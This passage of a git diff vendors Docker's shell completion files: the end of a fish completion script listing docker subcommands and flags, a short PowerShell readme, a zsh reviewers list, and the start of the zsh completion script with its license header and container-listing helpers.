be applied to the resulting image in case of success' + +# commit +complete -c docker -f -n '__fish_docker_no_subcommand' -a commit -d "Create a new image from a container's changes" +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s a -l author -d 'Author (e.g., "John Hannibal Smith ")' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s m -l message -d 'Commit message' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s p -l pause -d 'Pause container during commit' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -a '(__fish_print_docker_containers all)' -d "Container" + +# cp +complete -c docker -f -n '__fish_docker_no_subcommand' -a cp -d "Copy files/folders between a container and the local filesystem" +complete -c docker -A -f -n '__fish_seen_subcommand_from cp' -l help -d 'Print usage' + +# create +complete -c docker -f -n '__fish_docker_no_subcommand' -a create -d 'Create a new container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpu-shares -d 'CPU shares (relative weight)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-add -d 'Add Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-drop -d 'Drop Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cidfile -d 'Write the container ID to the file' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns -d 'Set custom DNS servers' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s e -l env -d 'Set environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l env-file -d 'Read in a line delimited file of environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s h -l hostname -d 'Container host name' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s i -l interactive -d 'Keep STDIN open even if not attached' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l link -d 'Add link to another container in the form of :alias' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l name -d 'Assign a name to the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l net -d 'Set the Network mode for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s p -l publish -d "Publish a container's port to the host" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l pid -d 'Default is to create a private PID namespace for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l privileged -d 'Give extended privileges to this container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l read-only -d "Mount the container's root filesystem as read only" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l security-opt -d 'Security Options' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s t -l tty -d 'Allocate a pseudo-TTY' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s u -l user -d 'Username or UID' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l volumes-from -d 'Mount volumes from the specified container(s)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s w -l workdir -d 'Working directory inside the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -a '(__fish_print_docker_images)' -d "Image" + +# diff +complete -c docker -f -n '__fish_docker_no_subcommand' -a diff -d "Inspect changes on a container's filesystem" +complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -a '(__fish_print_docker_containers all)' -d "Container" + +# events +complete -c docker -f -n '__fish_docker_no_subcommand' -a events -d 'Get real time events from the server' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -s f -l filter -d "Provide filter values (i.e., 'event=stop')" +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l since -d 'Show all events created since timestamp' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l until -d 'Stream events until this timestamp' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l format -d 'Format the output using the given go template' + +# exec +complete -c docker -f -n '__fish_docker_no_subcommand' -a exec -d 'Run a command in a running container' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s d -l detach -d 'Detached mode: run command in the background' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s i -l interactive -d 'Keep STDIN open even if not attached' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s t -l tty -d 'Allocate a pseudo-TTY' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -a '(__fish_print_docker_containers running)' -d "Container" + +# export +complete -c docker -f -n '__fish_docker_no_subcommand' -a export -d 'Stream the contents of a container as a tar archive' +complete -c docker -A -f -n '__fish_seen_subcommand_from export' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from export' -a '(__fish_print_docker_containers all)' -d "Container" + +# history +complete -c docker -f -n '__fish_docker_no_subcommand' -a history -d 'Show the history of an image' +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -s q -l quiet -d 'Only show numeric IDs' +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -a '(__fish_print_docker_images)' -d "Image" + +# images +complete -c docker -f -n '__fish_docker_no_subcommand' -a images -d 'List images' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s a -l all -d 'Show all images (by default filter out the intermediate image layers)' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s f -l filter -d "Provide filter values (i.e., 'dangling=true')" +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s q -l quiet -d 'Only show numeric IDs' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -a '(__fish_print_docker_repositories)' -d "Repository" + +# import +complete -c docker -f -n '__fish_docker_no_subcommand' -a import -d 'Create a new filesystem image from the contents of a tarball' +complete -c docker -A -f -n '__fish_seen_subcommand_from import' -l help -d 'Print usage' + +# info +complete -c docker -f -n '__fish_docker_no_subcommand' -a info -d 'Display system-wide information' +complete -c docker -A -f -n '__fish_seen_subcommand_from info' -s f -l format -d 'Format the output using the given go template' +complete -c docker -A -f -n '__fish_seen_subcommand_from info' -l help -d 'Print usage' + +# inspect +complete -c docker -f -n '__fish_docker_no_subcommand' -a inspect -d 'Return low-level information on a container or image' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s f -l format -d 'Format the output using the given go template.' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s s -l size -d 'Display total file sizes if the type is container.' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_images)' -d "Image" +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_containers all)' -d "Container" + +# kill +complete -c docker -f -n '__fish_docker_no_subcommand' -a kill -d 'Kill a running container' +complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -s s -l signal -d 'Signal to send to the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -a '(__fish_print_docker_containers running)' -d "Container" + +# load +complete -c docker -f -n '__fish_docker_no_subcommand' -a load -d 'Load an image from a tar archive' +complete -c docker -A -f -n '__fish_seen_subcommand_from load' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from load' -s i -l input -d 'Read from a tar archive file, instead of STDIN' + +# login +complete -c docker -f -n '__fish_docker_no_subcommand' -a login -d 'Log in to a Docker registry server' +complete -c docker -A -f -n '__fish_seen_subcommand_from login' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s p -l password -d 'Password' +complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s u -l username -d 'Username' + +# logout +complete -c docker -f -n '__fish_docker_no_subcommand' -a logout -d 'Log out from a Docker registry server' + +# logs +complete -c docker -f -n '__fish_docker_no_subcommand' -a logs -d 'Fetch the logs of a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s f -l follow -d 'Follow log output' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s t -l timestamps -d 'Show timestamps' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l since -d 'Show logs since timestamp' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l tail -d 'Output the specified number of lines at the end of logs (defaults to all logs)' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -a '(__fish_print_docker_containers running)' -d "Container" + +# port +complete -c docker -f -n '__fish_docker_no_subcommand' -a port -d 'Lookup the public-facing port that is NAT-ed to PRIVATE_PORT' +complete -c docker -A -f -n '__fish_seen_subcommand_from port' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from port' -a '(__fish_print_docker_containers running)' -d "Container" + +# pause +complete -c docker -f -n '__fish_docker_no_subcommand' -a pause -d 'Pause all processes within a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from pause' -a '(__fish_print_docker_containers running)' -d "Container" + +# ps +complete -c docker -f -n '__fish_docker_no_subcommand' -a ps -d 'List containers' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s a -l all -d 'Show all containers. Only running containers are shown by default.' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l before -d 'Show only container created before Id or Name, include non-running ones.' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s f -l filter -d 'Provide filter values. Valid filters:' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s l -l latest -d 'Show only the latest created container, include non-running ones.' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s n -d 'Show n last created containers, include non-running ones.' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s q -l quiet -d 'Only display numeric IDs' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s s -l size -d 'Display total file sizes' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l since -d 'Show only containers created since Id or Name, include non-running ones.' + +# pull +complete -c docker -f -n '__fish_docker_no_subcommand' -a pull -d 'Pull an image or a repository from a Docker registry server' +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -s a -l all-tags -d 'Download all tagged images in the repository' +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_images)' -d "Image" +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_repositories)' -d "Repository" + +# push +complete -c docker -f -n '__fish_docker_no_subcommand' -a push -d 'Push an image or a repository to a Docker registry server' +complete -c docker -A -f -n '__fish_seen_subcommand_from push' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_images)' -d "Image" +complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_repositories)' -d "Repository" + +# rename +complete -c docker -f -n '__fish_docker_no_subcommand' -a rename -d 'Rename an existing container' + +# restart +complete -c docker -f -n '__fish_docker_no_subcommand' -a restart -d 'Restart a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -s t -l time -d 'Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.' +complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -a '(__fish_print_docker_containers running)' -d "Container" + +# rm +complete -c docker -f -n '__fish_docker_no_subcommand' -a rm -d 'Remove one or more containers' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -d 'Force the removal of a running container (uses SIGKILL)' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s l -l link -d 'Remove the specified link and not the underlying container' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s v -l volumes -d 'Remove the volumes associated with the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -a '(__fish_print_docker_containers stopped)' -d "Container" +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -a '(__fish_print_docker_containers all)' -d "Container" + +# rmi +complete -c docker -f -n '__fish_docker_no_subcommand' -a rmi -d 'Remove one or more images' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -s f -l force -d 'Force removal of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l no-prune -d 'Do not delete untagged parents' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -a '(__fish_print_docker_images)' -d "Image" + +# run +complete -c docker -f -n '__fish_docker_no_subcommand' -a run -d 'Run a command in a new container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s c -l cpu-shares -d 'CPU shares (relative weight)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-add -d 'Add Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-drop -d 'Drop Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cidfile -d 'Write the container ID to the file' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s d -l detach -d 'Detached mode: run the container in the background and print the new container ID' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns -d 'Set custom DNS servers' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s e -l env -d 'Set environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l env-file -d 'Read in a line delimited file of environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s h -l hostname -d 'Container host name' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s i -l interactive -d 'Keep STDIN open even if not attached' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l link -d 'Add link to another container in the form of :alias' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l name -d 'Assign a name to the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l net -d 'Set the Network mode for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s p -l publish -d "Publish a container's port to the host" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l pid -d 'Default is to create a private PID namespace for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l privileged -d 'Give extended privileges to this container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l read-only -d "Mount the container's root filesystem as read only" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l rm -d 'Automatically remove the container when it exits (incompatible with -d)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l security-opt -d 'Security Options' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l sig-proxy -d 'Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied.' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l stop-signal -d 'Signal to kill a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s t -l tty -d 'Allocate a pseudo-TTY' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s u -l user -d 'Username or UID' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l tmpfs -d 'Mount tmpfs on a directory' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l volumes-from -d 'Mount volumes from the specified container(s)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s w -l workdir -d 'Working directory inside the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -a '(__fish_print_docker_images)' -d "Image" + +# save +complete -c docker -f -n '__fish_docker_no_subcommand' -a save -d 'Save an image to a tar archive' +complete -c docker -A -f -n '__fish_seen_subcommand_from save' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from save' -s o -l output -d 'Write to an file, instead of STDOUT' +complete -c docker -A -f -n '__fish_seen_subcommand_from save' -a '(__fish_print_docker_images)' -d "Image" + +# search +complete -c docker -f -n '__fish_docker_no_subcommand' -a search -d 'Search for an image on the registry (defaults to the Docker Hub)' +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l automated -d 'Only show automated builds' +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -s s -l stars -d 'Only displays with at least x stars' + +# start +complete -c docker -f -n '__fish_docker_no_subcommand' -a start -d 'Start a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s a -l attach -d "Attach container's STDOUT and STDERR and forward all signals to the process" +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s i -l interactive -d "Attach container's STDIN" +complete -c docker -A -f -n '__fish_seen_subcommand_from start' -a '(__fish_print_docker_containers stopped)' -d "Container" + +# stats +complete -c docker -f -n '__fish_docker_no_subcommand' -a stats -d "Display a live stream of one or more containers' resource usage statistics" +complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l no-stream -d 'Disable streaming stats and only pull the first result' +complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -a '(__fish_print_docker_containers running)' -d "Container" + +# stop +complete -c docker -f -n '__fish_docker_no_subcommand' -a stop -d 'Stop a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -s t -l time -d 'Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.' +complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -a '(__fish_print_docker_containers running)' -d "Container" + +# tag +complete -c docker -f -n '__fish_docker_no_subcommand' -a tag -d 'Tag an image into a repository' +complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -s f -l force -d 'Force' +complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -l help -d 'Print usage' + +# top +complete -c docker -f -n '__fish_docker_no_subcommand' -a top -d 'Lookup the running processes of a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from top' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from top' -a '(__fish_print_docker_containers running)' -d "Container" + +# unpause +complete -c docker -f -n '__fish_docker_no_subcommand' -a unpause -d 'Unpause a paused container' +complete -c docker -A -f -n '__fish_seen_subcommand_from unpause' -a '(__fish_print_docker_containers running)' -d "Container" + +# version +complete -c docker -f -n '__fish_docker_no_subcommand' -a version -d 'Show the Docker version information' +complete -c docker -A -f -n '__fish_seen_subcommand_from version' -s f -l format -d 'Format the output using the given go template' +complete -c docker -A -f -n '__fish_seen_subcommand_from version' -l help -d 'Print usage' + +# wait +complete -c docker -f -n '__fish_docker_no_subcommand' -a wait -d 'Block until a container stops, then print its exit code' +complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -a '(__fish_print_docker_containers running)' -d "Container" diff --git a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt new file mode 100644 index 0000000000..18e1b53c13 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt @@ -0,0 +1 @@ +See https://github.com/samneirinck/posh-docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS new file mode 100644 index 0000000000..03ee2dde3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS @@ -0,0 +1,2 @@ +Tianon Gravi (@tianon) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker new file mode 100644 index 0000000000..ecae826a4a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker @@ -0,0 +1,2787 @@ +#compdef docker dockerd +# +# zsh completion for docker (http://docker.com) +# +# version: 0.3.0 +# github: https://github.com/felixr/docker-zsh-completion +# +# contributors: +# - Felix Riedel +# - Steve Durrheimer +# - Vincent Bernat +# +# license: +# +# Copyright (c) 2013, Felix Riedel +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# * Neither the name of the nor the +# names of its contributors may be used to endorse or promote products +# derived from this software without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# + +# Short-option stacking can be enabled with: +# zstyle ':completion:*:*:docker:*' option-stacking yes +# zstyle ':completion:*:*:docker-*:*' option-stacking yes +__docker_arguments() { + if zstyle -t ":completion:${curcontext}:" option-stacking; then + print -- -s + fi +} + +__docker_get_containers() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local kind type line s + declare -a running stopped lines args names + + kind=$1; shift + type=$1; shift + [[ $kind = (stopped|all) ]] && args=($args -a) + + lines=(${(f)${:-"$(_call_program commands docker $docker_options ps --format 'table' --no-trunc $args)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 # Last column, should go to the end of the line + lines=(${lines[2,-1]}) + + # Container ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${${line[${begin[CONTAINER ID]},${end[CONTAINER ID]}]%% ##}[0,12]}" + s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" + s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" + if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then + stopped=($stopped $s) + else + running=($running $s) + fi + done + fi + + # Names: we only display the one without slash. All other names + # are generated and may clutter the completion. However, with + # Swarm, all names may be prefixed by the swarm node name. + if [[ $type = (names|all) ]]; then + for line in $lines; do + names=(${(ps:,:)${${line[${begin[NAMES]},${end[NAMES]}]}%% *}}) + # First step: find a common prefix and strip it (swarm node case) + (( ${#${(u)names%%/*}} == 1 )) && names=${names#${names[1]%%/*}/} + # Second step: only keep the first name without a / + s=${${names:#*/*}[1]} + # If no name, well give up. + (( $#s != 0 )) || continue + s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" + s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" + if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then + stopped=($stopped $s) + else + running=($running $s) + fi + done + fi + + [[ $kind = (running|all) ]] && _describe -t containers-running "running containers" running "$@" && ret=0 + [[ $kind = (stopped|all) ]] && _describe -t containers-stopped "stopped containers" stopped "$@" && ret=0 + return ret +} + +__docker_complete_stopped_containers() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers stopped all "$@" +} + +__docker_complete_running_containers() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers running all "$@" +} + +__docker_complete_containers() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers all all "$@" +} + +__docker_complete_containers_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_containers all ids 